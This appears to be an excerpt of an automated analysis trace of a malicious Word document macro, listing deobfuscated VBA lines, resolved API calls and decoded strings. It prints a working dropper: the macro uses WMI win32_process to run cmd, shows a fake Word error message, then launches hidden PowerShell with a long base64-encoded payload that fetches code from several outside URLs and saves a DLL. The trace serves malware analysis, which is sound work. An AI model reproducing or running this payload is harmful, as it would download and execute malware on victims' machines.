148	XFQcotHEl = XFQcotHEl + 2
149	Loop
150	Next	Paragraphs
150	vajlM:
152	Yw3n4ijej_c5k = Bcdtdfsryv3bc(Acanctsdu93)
153	Goto OYlTFEt
154	Set omukcDDAB = ezXAHG	ezXAHG
155	Dim WEjBx, ASxkJEBEJ, InWYD as Long
156	Dim bKFVL as Word.Paragraph
157	Dim sXjiJI() as Byte
158	For Each bKFVL in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
159	sXjiJI = bKFVL.Range	Range
160	dscc = "sadsaccc" & bKFVL.Range	Range
161	ASxkJEBEJ = UBound(sXjiJI) - 1	UBound
162	WEjBx = 0
163	Set SysLpJnC = pWDVU	pWDVU
164	Do Until ASxkJEBEJ > ASxkJEBEJ
165	If sXjiJI(ASxkJEBEJ) = 46 Or ASxkJEBEJ = ASxkJEBEJ Then
166	dscc = "sasdsacc" & (WEjBx / 2) + 1 & " to " & (ASxkJEBEJ / 2) + 1 & MidB$(sXjiJI, WEjBx + 1, ASxkJEBEJ - WEjBx + 3)	MidB$
167	WEjBx = ASxkJEBEJ + 2
168	Endif
169	ASxkJEBEJ = ASxkJEBEJ + 2
170	Loop
171	Next	Paragraphs
171	OYlTFEt:
173	Set H2lplpiprsq2y = CreateObject(Yw3n4ijej_c5k)	CreateObject("winmgmts:win32_process") executed
174	Goto avenCHqCM
175	Set nYfpXuDyH = HYflxGv	HYflxGv
176	Dim HaMJF, tLOwC, MeewHjDR as Long
177	Dim OCclfDa as Word.Paragraph
178	Dim qLAiGc() as Byte
179	For Each OCclfDa in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
180	qLAiGc = OCclfDa.Range	Range
181	dscc = "sadsaccc" & OCclfDa.Range	Range
182	tLOwC = UBound(qLAiGc) - 1	UBound
183	HaMJF = 0
184	Set BkCHJMwO = dBfQDv	dBfQDv
185	Do Until tLOwC > tLOwC
186	If qLAiGc(tLOwC) = 46 Or tLOwC = tLOwC Then
187	dscc = "sasdsacc" & (HaMJF / 2) + 1 & " to " & (tLOwC / 2) + 1 & MidB$(qLAiGc, HaMJF + 1, tLOwC - HaMJF + 3)	MidB$
188	HaMJF = tLOwC + 2
189	Endif
190	tLOwC = tLOwC + 2
191	Loop
192	Next	Paragraphs
192	avenCHqCM:
194	njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))	Mid Len(" x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAAx [ sh bgAFx [ sh bMAdx [ sh bgAgx [ sh bACAx [ sh bAUAx [ sh bBCAx [ sh bDUAx [ sh bbwAx [ sh bgACx [ sh bAAKx [ sh bABbx [ sh bAFQx [ sh bAWQx [ sh bBwAx [ sh bEUAx [ sh bXQAx [ sh boACx [ sh bIAex [ sh bwAyx [ sh bAH0x [ sh bAewx [ sh bAxAx [ sh bH0Ax [ sh bewAx [ sh b1AHx [ sh b0Aex [ sh bwAzx [ sh bAH0x [ sh bAewx [ sh bAwAx [ sh bH0Ax [ sh bewAx [ sh b2AHx [ sh b0Aex [ sh bwA0x [ sh bAH0x [ sh bAIgx [ sh bAgAx [ sh bC0Ax [ sh bRgAx [ sh bgACx [ sh bcAVx [ sh bAAnx [ sh bACwx [ sh bAJwx [ sh bBFAx [ sh bE0Ax [ sh bLgBx [ sh bJACx [ sh bcALx [ sh bAAnx [ sh bAFMx [ sh bAWQx [ sh bBzAx [ sh bFQAx [ sh bJwAx [ sh bsACx [ sh bcAZx [ sh bQBDx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bHkAx [ sh bJwAx [ sh bsACx [ sh bcAbx [ sh bwAux [ sh bAEQx [ sh bASQx [ sh bBSAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh b8AUx [ sh bgAnx [ sh bACkx [ sh bAIAx [ sh bApAx [ sh bCAAx [ sh bOwAx [ sh bgACx [ sh bAAUx [ sh bwBFx [ sh bAHQx [ sh bALQx [ sh bBJAx [ sh bFQAx [ sh bRQBx [ sh btACx [ sh bAAdx [ sh bgBBx [ sh bAFIx [ sh bASQx [ sh bBhAx [ sh bEIAx [ sh bTABx [ sh blADx [ sh boAbx [ sh bQA3x [ sh bAGEx [ sh bAOQx [ sh bAgAx [ sh bCgAx [ sh bWwBx [ sh b0AHx [ sh bkAcx [ sh bABFx [ sh bAF0x [ sh bAKAx [ sh bAiAx [ sh bHsAx [ sh bNABx [ sh b9AHx [ sh bsAMx [ sh bgB9x [ sh bAHsx [ sh bAMwx [ sh bB9Ax [ sh bHsAx [ sh bNQBx [ sh b9AHx [ sh bsAMx [ sh bQB9x [ sh bAHsx [ sh bANgx [ sh bB9Ax [ sh bHsAx [ sh bMABx [ sh b9AHx [ sh bsANx [ sh bwB9x [ sh bACIx [ sh bAIAx [ sh bAtAx [ sh bGYAx [ sh bJwBx [ sh buACx [ sh bcALx [ sh bAAnx [ sh bAEkx [ sh bAQwx [ sh bBFAx [ sh bHAAx [ sh bTwBx [ sh bJAEx [ sh b4Adx [ sh bABtx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bG4Ax [ sh bZQBx [ sh bUACx [ sh bcALx [ sh bAAnx [ sh bAC4x [ sh bAJwx [ sh bAsAx [ sh bCcAx [ sh bcwBx [ sh b5AFx [ sh bMAdx [ sh bABlx [ sh bAE0x [ sh bALgx [ sh bAnAx [ sh bCwAx [ sh bJwBx [ sh bzAEx [ sh bUAUx [ sh bgB2x [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bEEAx [ sh bJwAx [ sh bsACx [ sh bcAYx [ sh bQBHx [ sh bAGUx [ sh bAcgx [ sh bAnAx [ sh bCkAx [ sh bIAAx [ sh bpACx [ sh bAAIx [ sh bAA7x [ sh bACAx [ sh bAIAx [ sh bAkAx [ sh bEkAx [ sh baABx [ sh b2ADx [ sh bgAOx [ sh bQBfx [ sh bAGcx [ sh bAPQx [ sh bAkAx [ sh bE0Ax [ sh bOQAx [ sh bxAEx [ sh bcAIx [ sh bAArx [ sh bACAx [ sh bAWwx [ sh bBjAx [ sh bGgAx [ sh bYQBx [ sh byAFx [ sh b0AKx [ sh bAAzx [ sh bADMx [ sh bAKQx [ sh bAgAx [ sh bCsAx [ sh bIAAx [ sh bkAEx [ sh bgAMx [ sh bgAzx [ sh bAEQx [ sh bAOwx [ sh bAkAx [ sh bEQAx [ sh bOQAx [ sh b0AEx [ sh b0APx [ sh bQAox [ sh bACgx [ sh bAJwx [ sh bBQAx [ sh bDcAx [ sh bJwAx [ sh brACx [ sh bcAMx [ sh bgAnx [ sh bACkx [ sh bAKwx [ sh bAnAx [ sh bFgAx [ sh bJwAx [ sh bpADx [ sh bsAIx [ sh bAAox [ sh bAGcx [ sh bARQx [ sh bBUAx [ sh bC0Ax [ sh bdgBx [ sh bhAHx [ sh bIAax [ sh bQBhx [ sh bAEIx [ sh bAbAx [ sh bBlAx [ sh bCAAx [ sh bcABx [ s) -> 22560 executed
195	nnjasd = Bcdtdfsryv3bc(njcnja)
196	Goto hfACeBO
197	Set lIOoEHE = UvPjdXBJH	UvPjdXBJH
198	Dim FfmNDT, FrGcEy, uJJmytp as Long
199	Dim MIQyJC as Word.Paragraph
200	Dim cxLJIGiD() as Byte
201	For Each MIQyJC in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
202	cxLJIGiD = MIQyJC.Range	Range
203	dscc = "sadsaccc" & MIQyJC.Range	Range
204	FrGcEy = UBound(cxLJIGiD) - 1	UBound
205	FfmNDT = 0
206	Set fLcUFFJA = hrhpx	hrhpx
207	Do Until FrGcEy > FrGcEy
208	If cxLJIGiD(FrGcEy) = 46 Or FrGcEy = FrGcEy Then
209	dscc = "sasdsacc" & (FfmNDT / 2) + 1 & " to " & (FrGcEy / 2) + 1 & MidB$(cxLJIGiD, FfmNDT + 1, FrGcEy - FfmNDT + 3)	MidB$
210	FfmNDT = FrGcEy + 2
211	Endif
212	FrGcEy = FrGcEy + 2
213	Loop
214	Next	Paragraphs
214	hfACeBO:
216	H2lplpiprsq2y.Create nnjasd, Bf0256837rexe, A95ize8agn0fuh	SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB,,) -> 0 Bf0256837rexe A95ize8agn0fuh executed
217	Goto immQJ
218	Set NIEFpmJ = fgxZE	fgxZE
219	Dim QqMgHpfGB, mvXsJDCI, dKpjABOAD as Long
220	Dim fQyMHGCJ as Word.Paragraph
221	Dim LxgTE() as Byte
222	For Each fQyMHGCJ in Sky5mdbfre3xe7q8.Paragraphs	Paragraphs
223	LxgTE = fQyMHGCJ.Range	Range
224	dscc = "sadsaccc" & fQyMHGCJ.Range	Range
225	mvXsJDCI = UBound(LxgTE) - 1	UBound
226	QqMgHpfGB = 0
227	Set IPiQsIN = tFqUPL	tFqUPL
228	Do Until mvXsJDCI > mvXsJDCI
229	If LxgTE(mvXsJDCI) = 46 Or mvXsJDCI = mvXsJDCI Then
230	dscc = "sasdsacc" & (QqMgHpfGB / 2) + 1 & " to " & (mvXsJDCI / 2) + 1 & MidB$(LxgTE, QqMgHpfGB + 1, mvXsJDCI - QqMgHpfGB + 3)	MidB$
231	QqMgHpfGB = mvXsJDCI + 2
232	Endif
233	mvXsJDCI = mvXsJDCI + 2
234	Loop
235	Next	Paragraphs
235	immQJ:
237	End Function

Function Lf24kw93f4sab9, APIs: 44, Strings: 37, Number of lines: 123, Relevance: 147.123

APIs	Meta Information
noYAHFJkx
Paragraphs
Range
Range
UBound
HsCTGA
MidB$
IuiADKc
Paragraphs
Range
Range
UBound
nBWRH
MidB$
ukURCshB
Paragraphs
Range
Range
UBound
MoAcLJ
MidB$
Replace	Replace("wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh bx [ sh bx [ sh bsx [ sh bx [ sh bx [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh bx [ sh bpx [ sh bx [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b","x [ sh b",) -> winmgmts:win32_process Replace("x [ sh bx [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh bcx [ sh bmx [ sh bdx [ sh b x [ sh b/x [ sh bcx [ sh b x [ sh bmx [ sh b^x [ sh bsx [ sh b^x [ sh bgx [ sh b x [ sh b%x [ sh bux [ sh bsx [ sh bex [ sh brx [ sh bnx [ sh bax [ sh bmx [ sh bex [ sh b%x [ sh b x [ sh b/x [ sh bvx [ sh b x [ sh bWx [ sh box [ sh b^x [ sh brx [ sh bdx [ sh b x [ sh bex [ sh bxx [ sh bpx [ sh b^x [ sh bex [ sh brx [ sh bix [ sh bex [ sh bnx [ sh b^x [ sh bcx [ sh bex [ sh bdx [ sh b x [ sh bax [ sh bnx [ sh b x [ sh bex [ sh brx [ sh b^x [ sh brx [ sh box [ sh brx [ sh b x [ sh btx [ sh brx [ sh byx [ sh bix [ sh b^x [ sh bnx [ sh bgx [ sh b x [ sh btx [ sh box [ sh b x [ sh box [ sh bpx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh btx [ sh bhx [ sh b^x [ sh bex [ sh b x [ sh bfx [ sh bix [ sh b^x [ sh blx [ sh bex [ sh b.x [ sh b x [ sh b&x [ sh b x [ sh bpx [ sh b^x [ sh box [ sh bwx [ sh bex [ sh b^x [ sh brx [ sh bsx [ sh b^x [ sh bhx [ sh bex [ sh b^x [ sh blx [ sh blx [ sh b^x [ sh b x [ sh b-x [ sh bwx [ sh b x [ sh bhx [ sh bix [ sh b^x [ sh bdx [ sh bdx [ sh b^x [ sh bex [ sh bnx [ sh b x [ sh b-x [ sh b^x [ sh bex [ sh b^x [ sh bnx [ sh bcx [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b x [ sh b IAAx [ sh bgAFx [ sh bMAdx [ sh bgAgx [ sh bACAx [ sh bAUAx [ sh bBCAx [ sh bDUAx [ sh bbwAx [ sh bgACx [ sh bAAKx [ sh bABbx [ sh bAFQx [ sh bAWQx [ sh bBwAx [ sh bEUAx [ sh bXQAx [ sh boACx [ sh bIAex [ sh bwAyx [ sh bAH0x [ sh bAewx [ sh bAxAx [ sh bH0Ax [ sh bewAx [ sh b1AHx [ sh b0Aex [ sh bwAzx [ sh bAH0x [ sh bAewx [ sh bAwAx [ sh bH0Ax [ sh bewAx [ sh b2AHx [ sh b0Aex [ sh bwA0x [ sh bAH0x [ sh bAIgx [ sh bAgAx [ sh bC0Ax [ sh bRgAx [ sh bgACx [ sh bcAVx [ sh bAAnx [ sh bACwx [ sh bAJwx [ sh bBFAx [ sh bE0Ax [ sh bLgBx [ sh bJACx [ sh bcALx [ sh bAAnx [ sh bAFMx [ sh bAWQx [ sh bBzAx [ sh bFQAx [ sh bJwAx [ sh bsACx [ sh bcAZx [ sh bQBDx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bHkAx [ sh bJwAx [ sh bsACx [ sh bcAbx [ sh bwAux [ sh bAEQx [ sh bASQx [ sh bBSAx [ sh bCcAx [ sh bLAAx [ sh bnAEx [ sh b8AUx [ sh bgAnx [ sh bACkx [ sh bAIAx [ sh bApAx [ sh bCAAx [ sh bOwAx [ sh bgACx [ sh bAAUx [ sh bwBFx [ sh bAHQx [ sh bALQx [ sh bBJAx [ sh bFQAx [ sh bRQBx [ sh btACx [ sh bAAdx [ sh bgBBx [ sh bAFIx [ sh bASQx [ sh bBhAx [ sh bEIAx [ sh bTABx [ sh blADx [ sh boAbx [ sh bQA3x [ sh bAGEx [ sh bAOQx [ sh bAgAx [ sh bCgAx [ sh bWwBx [ sh b0AHx [ sh bkAcx [ sh bABFx [ sh bAF0x [ sh bAKAx [ sh bAiAx [ sh bHsAx [ sh bNABx [ sh b9AHx [ sh bsAMx [ sh bgB9x [ sh bAHsx [ sh bAMwx [ sh bB9Ax [ sh bHsAx [ sh bNQBx [ sh b9AHx [ sh bsAMx [ sh bQB9x [ sh bAHsx [ sh bANgx [ sh bB9Ax [ sh bHsAx [ sh bMABx [ sh b9AHx [ sh bsANx [ sh bwB9x [ sh bACIx [ sh bAIAx [ sh bAtAx [ sh bGYAx [ sh bJwBx [ sh buACx [ sh bcALx [ sh bAAnx [ sh bAEkx [ sh bAQwx [ sh bBFAx [ sh bHAAx [ sh bTwBx [ sh bJAEx [ sh b4Adx [ sh bABtx [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bG4Ax [ sh bZQBx [ sh bUACx [ sh bcALx [ sh bAAnx [ sh bAC4x [ sh bAJwx [ sh bAsAx [ sh bCcAx [ sh bcwBx [ sh b5AFx [ sh bMAdx [ sh bABlx [ sh bAE0x [ sh bALgx [ sh bAnAx [ sh bCwAx [ sh bJwBx [ sh bzAEx [ sh bUAUx [ sh bgB2x [ sh bACcx [ sh bALAx [ sh bAnAx [ sh bEEAx [ sh bJwAx [ sh bsACx [ sh bcAYx [ sh bQBHx [ sh bAGUx [ sh bAcgx [ sh bAnAx [ sh bCkAx [ sh bIAAx [ sh bpACx [ sh bAAIx [ sh bAA7x [ sh bACAx [ sh bAIAx [ sh bAkAx [ sh bEkAx [ sh baABx [ sh b2ADx [ sh bgAOx [ sh bQBfx [ sh bAGcx [ sh bAPQx [ sh bAkAx [ sh bE0Ax [ sh bOQAx [ sh bxAEx [ sh bcAIx [ sh bAArx [ sh bACAx [ sh bAWwx [ sh bBjAx [ sh bGgAx [ sh bYQBx [ sh byAFx [ sh b0AKx [ sh bAAzx [ sh bADMx [ sh bAKQx [ sh bAgAx [ sh bCsAx [ sh bIAAx [ sh bkAEx [ sh bgAMx [ sh bgAzx [ sh bAEQx [ sh bAOwx [ sh bAkAx [ sh bEQAx [ sh bOQAx [ sh b0AEx [ sh b0APx [ sh bQAox [ sh bACgx [ sh bAJwx [ sh bBQAx [ sh bDcAx [ sh bJwAx [ sh brACx [ sh bcAMx [ sh bgAnx [ sh bACkx [ sh bAKwx [ sh bAnAx [ sh bFgAx [ sh bJwAx [ sh bpADx [ sh bsAIx [ sh bAAox [ sh bAGcx [ sh bARQx [ sh bBUAx [ sh bC0Ax [ sh bdgBx [ sh bhAHx [ sh bIAax [ sh bQBhx [ sh bAEIx [ sh bAbAx [ sh bBlAx [ sh bCAAx [ sh bcABx [ sh b,"x [ sh b",) -> cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBu